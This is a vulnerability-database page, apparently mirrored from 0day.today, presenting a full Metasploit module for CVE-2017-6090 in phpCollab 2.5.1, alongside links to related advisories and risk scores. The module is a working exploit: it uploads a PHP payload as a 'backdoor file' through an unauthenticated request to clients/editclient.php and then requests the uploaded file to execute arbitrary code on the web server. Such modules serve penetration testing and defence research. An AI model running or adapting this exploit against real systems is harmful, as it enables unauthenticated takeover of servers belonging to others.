Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpCollab 2.5.1 - Unauthenticated File Upload Exploit

🗓️ 11 Jan 2018 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 63 Views

phpCollab 2.5.1 Unauthenticated File Upload vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		PhpCollab 2.5.1 Shell Upload Exploit
30 Sep 201700:00
zdt
Circl		CVE-2017-6090
2 Oct 201700:00
circl
CNVD		PhpCollab Arbitrary Code Execution Vulnerability
21 May 201800:00
cnvd
CVE		CVE-2017-6090
2 Oct 201717:00
cve
Cvelist		CVE-2017-6090
2 Oct 201717:00
cvelist
Exploit DB		phpCollab 2.5.1 - Arbitrary File Upload
2 Oct 201700:00
exploitdb
Exploit DB		phpCollab 2.5.1 - File Upload (Metasploit)
11 Jan 201800:00
exploitdb
exploitpack		phpCollab 2.5.1 - Arbitrary File Upload
2 Oct 201700:00
exploitpack
Metasploit		phpCollab 2.5.1 Unauthenticated File Upload
20 Dec 201713:36
metasploit
Nuclei		PhpColl 2.5.1 Arbitrary File Upload
3 Jun 202606:04
nuclei
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload',
      'Description'    => %q{
          This module exploits a file upload vulnerability in phpCollab 2.5.1
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the web server user.
 
        The exploit has been tested on Ubuntu 16.04.3 64-bit
      },
      'Author'         =>
        [
          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery
          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-6090' ],
          [ 'EDB', '42934' ],
          [ 'URL', 'http://www.phpcollab.com/' ],
          [ 'URL', 'https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 29 2017'
      ))
 
      register_options(
        [
          OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
        ])
  end
 
  def check
    url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
    res = send_request_cgi(
        'method'  => 'GET',
        'uri'     =>  url
    )
 
    version = res.body.scan(/PhpCollab v([\d\.]+)/).flatten.first
    vprint_status("Found version: #{version}")
 
    unless version
      vprint_status('Unable to get the PhpCollab version.')
      return CheckCode::Unknown
    end
 
    if Gem::Version.new(version) >= Gem::Version.new('0')
      return CheckCode::Appears
    end
 
    CheckCode::Safe
  end
 
  def exploit
    filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
    id = File.basename(filename,File.extname(filename))
    register_file_for_cleanup(filename)
 
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")
 
    print_status("Uploading backdoor file: #{filename}")
 
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'clients/editclient.php'),
      'vars_get' => {
        'id'     => id,
        'action' => 'update'
      },
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
     })
 
    if res && res.code == 302
      print_good("Backdoor successfully created.")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end
 
    print_status("Triggering the exploit...")
    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "logos_clients/" + filename)
     }, 5)
  end
end

#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Jan 2018 00:00Current
8.6High risk
Vulners AI Score8.6
EPSS0.86913
metasploit modulearbitrary code executionubuntucveedbphpcollabfile uploadunauthenticatedsysdream2017-6090
63